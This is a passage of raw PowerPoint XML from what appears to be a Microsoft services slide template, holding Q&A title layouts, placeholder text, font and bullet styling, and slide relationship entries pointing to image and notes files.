        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545393" y="4482889"/>
            <a:ext cx="8085015"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a:t>Click to Edit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="538973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amp;A Option 2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="C:\Users\v-ameshm\Desktop\chess1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"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 y="4097868"/>
            <a:ext cx="9144002"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8" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545393" y="4482889"/>
            <a:ext cx="8085015"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a:t>Click to Edit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121352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amp;A Option 3">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="C:\Users\v-ameshm\Desktop\blueprint3.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>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a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="68422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 y="4097868"/>
            <a:ext cx="9144002"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9" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545393" y="4482889"/>
            <a:ext cx="8085015"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a:t>Click to Edit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300173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amp;A Option 4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="C:\Users\v-ameshm\Desktop\blueprint2.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>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a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144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 y="4097868"/>
            <a:ext cx="9175805"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Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545393" y="4482889"/>
            <a:ext cx="8085015"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a:t>Click to Edit</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423390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Q&amp;A Option 5">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="\\home\users\Amesh\4. Projects &amp; Companies\Microsoft\Services Marketing\Project Florance\Graphics and Templates\August Release\MCS FY11 Templates\Photos\Strategy1_small.jpg"/>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 y="4097868"/>
            <a:ext cx="9144001"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9" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545393" y="4482889"/>
            <a:ext cx="8085015"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a:t>Click to Edit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322003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amp;A Option 6">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="\\home\users\Amesh\4. Projects &amp; Companies\Microsoft\Services Marketing\Project Florance\Graphics and Templates\August Release\MCS FY11 Templates\Photos\Consulting3_small.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 y="4097868"/>
            <a:ext cx="9144001"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Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545393" y="4482889"/>
            <a:ext cx="8085015"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a:t>Click to Edit</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1357599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amp;A Option 7">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="\\home\users\Amesh\4. Projects &amp; Companies\Microsoft\Services Marketing\Project Florance\Graphics and Templates\August Release\MCS FY11 Templates\Photos\Consulting2_small.jpg"/>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0" y="0"/>
            <a:ext cx="917927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 y="4097868"/>
            <a:ext cx="9175805"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Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545393" y="4482889"/>
            <a:ext cx="8085015"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a:t>Click to Edit</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317551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cSld name="2.9 Picture_Caption_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4953000"/>
            <a:ext cx="8229600" cy="566738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1600" b="1">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228600" y="228600"/>
            <a:ext cx="8686800" cy="4648200"/>
          </a:xfr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533400" y="5529466"/>
            <a:ext cx="8229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
        <p:nvSpPr>
          <p:cNvPr id="26"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7"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125544390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81000" y="1411552"/>
            <a:ext cx="8382000" cy="1277273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="1700">
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="1400">
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="1100">
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="800">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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763000" y="6584841"/>
            <a:ext cx="381000" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1551F3A1-5374-4B1D-BEDA-FA01802D5A6C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26021874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0250" y="2590800"/>
            <a:ext cx="8032750" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="4400">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730249" y="4344988"/>
            <a:ext cx="7681913" cy="461665"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3600" b="0" kern="1200" cap="none"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4859030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FDB1C4-1BAF-460F-8361-CB4FBEAC1087}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B25136CE-EE85-4FE3-9E4A-262CAB4753F1}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34418208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1_Lab Page">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-94" y="858"/>
            <a:ext cx="9144095" cy="6856285"/>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68344" y="123328"/>
            <a:ext cx="1493897" cy="1493897"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4340744" y="6488700"/>
            <a:ext cx="462609" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{0462CC3E-48DD-4274-8616-D549FD7B2C15}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A4D7F4"/>
                </a:solidFill>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A4D7F4"/>
              </a:solidFill>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648742" y="1463040"/>
            <a:ext cx="7924800" cy="1384995"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="274320" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="548640" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="822960" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1097280" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1371600" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 1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
        <p:nvSpPr>
          <p:cNvPr id="22" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389436" y="360402"/>
            <a:ext cx="8363938" cy="509171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="628650" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="A4D7F4"/>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09518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F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FDB1C4-1BAF-460F-8361-CB4FBEAC1087}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/3/2023</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B25136CE-EE85-4FE3-9E4A-262CAB4753F1}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3864285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F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FDB1C4-1BAF-460F-8361-CB4FBEAC1087}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/3/2023</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B25136CE-EE85-4FE3-9E4A-262CAB4753F1}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378020439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image" Target="../media/image14.png"/><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theme" Target="../theme/theme2.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fr-FR"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FDB1C4-1BAF-460F-8361-CB4FBEAC1087}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/3/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"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5136CE-EE85-4FE3-9E4A-262CAB4753F1}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404825357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 id="2147483805" r:id="rId32"/>
    <p:sldLayoutId id="2147483806" r:id="rId33"/>
    <p:sldLayoutId id="2147483807" r:id="rId34"/>
    <p:sldLayoutId id="2147483808" r:id="rId35"/>
    <p:sldLayoutId id="2147483809" r:id="rId36"/>
    <p:sldLayoutId id="2147483810" r:id="rId37"/>
    <p:sldLayoutId id="2147483811" r:id="rId38"/>
    <p:sldLayoutId id="2147483812" r:id="rId39"/>
    <p:sldLayoutId id="2147483813" r:id="rId40"/>
    <p:sldLayoutId id="2147483814" r:id="rId41"/>
    <p:sldLayoutId id="2147483847" r:id="rId42"/>
    <p:sldLayoutId id="2147483848" r:id="rId4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356616"/>
            <a:ext cx="8363938" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square"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51681" y="1673355"/>
            <a:ext cx="8363937" cy="169277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2" r:id="rId16"/>
    <p:sldLayoutId id="2147483834" r:id="rId17"/>
    <p:sldLayoutId id="2147483835" r:id="rId18"/>
    <p:sldLayoutId id="2147483836" r:id="rId19"/>
    <p:sldLayoutId id="2147483837" r:id="rId20"/>
    <p:sldLayoutId id="2147483838" r:id="rId21"/>
    <p:sldLayoutId id="2147483839" r:id="rId22"/>
    <p:sldLayoutId id="2147483840" r:id="rId23"/>
    <p:sldLayoutId id="2147483843" r:id="rId24"/>
    <p:sldLayoutId id="2147483845" r:id="rId25"/>
    <p:sldLayoutId id="2147483846" r:id="rId26"/>
    <p:sldLayoutId id="2147483850"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3" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr lang="en-US" sz="4000" b="0" kern="1200" cap="none" spc="-100" baseline="0" dirty="0" smtClean="0">
          <a:ln w="3175">
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst/>
          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
          <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
          <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="274320" indent="-274320" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFontTx/>
        <a:buBlip>
          <a:blip r:embed="rId29"/>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29"/>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29"/>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29"/>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29"/>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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide101.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49.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image155.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide101.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.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158.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image157.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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82.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide104.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 